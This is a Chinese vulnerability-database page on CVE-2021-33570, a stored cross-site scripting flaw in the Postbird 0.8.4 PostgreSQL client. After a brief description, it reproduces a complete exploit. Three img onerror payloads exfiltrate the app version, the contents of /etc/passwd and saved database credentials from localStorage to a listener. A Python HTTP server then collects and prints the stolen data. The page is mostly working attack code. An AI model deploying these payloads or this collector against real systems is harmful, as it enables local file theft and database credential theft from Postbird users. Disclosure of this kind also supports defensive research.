文章目录[隐藏]
postbird 跨站脚本漏洞
漏洞ID | 2456926 | 漏洞类型 | 跨站脚本 |
发布时间 | 2021-05-27 | 更新时间 | 2021-06-24 |
CVE编号 | CVE-2021-33570 | CNNVD-ID | CNNVD-202105-1665 |
漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
postbird是一个应用软件。用于JavaScript编写的跨平台PostgreSQL GUI客户端,可与Electron一起运行。 Postbird 0.8.4版本中存在跨站脚本漏洞,该漏洞源于允许通过任何PostgreSQL数据库表中的IMG元素的onerror属性存储XSS。攻击者可以通过涉及XMLHttpRequest的向量读取本地文件并打开一个文件:URL,或者通过涉及Window的向量发现PostgreSQL密码。
|漏洞EXP
# Exploit Title: Postbird 0.8.4 - Javascript Injection
# Date: [26 May 2021]
# Exploit Author: Debshubra Chakraborty
# Vendor Homepage: https://github.com/paxa/postbird
# Software Link: https://www.electronjs.org/apps/postbird
# Version: 0.8.4
# Tested on: Linux
# CVE : CVE-2021-33570
"""
XSS Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">
LFI Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();">
PostgreSQL Password Stealing Payload
<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.parse
import re
hostName = '0.0.0.0'
serverPort = 5555
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
parse(urllib.parse.unquote(self.requestline))
def log_message(self, format, *args):
return
def parse(data):
expression = re.search('\S+=', data)
attr = expression.group()
if attr[2:len(attr)-1] == 'file':
data = data[12:len(data)-11]
data = data.rsplit('\\n')
print(f'\n[+] File received from LFI: \n\n')
for output in data:
print(output)
elif attr[2:len(attr)-1] == 'xss':
data = data[11:len(data)-10]
print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
elif attr[2:len(attr)-1] == 'credentials':
pos = re.search('{"\S+:', data)
data = data[pos.start():len(data)-11]
for i in range(2, len(data), 1):
if data[i] == '"':
pos = i
break
host = data[2:pos]
data = data[14:]
data = data.rsplit(',')
print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
for output in data:
print(output)
else:
print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
def main():
global hostName, serverPort
webServer = HTTPServer((hostName, serverPort), MyServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("\nServer stopped.")
if __name__ == "__main__":
main()
|参考资料
来源:MISC
链接:https://github.com/Tridentsec-io/postbird
来源:MISC
链接:https://github.com/Paxa/postbird/issues/134
来源:MISC
链接:https://github.com/Paxa/postbird/issues/132
来源:MISC
链接:https://github.com/Paxa/postbird/issues/133
本文由 华域联盟 原创撰写:华域联盟 » postbird 跨站脚本漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/103989.htm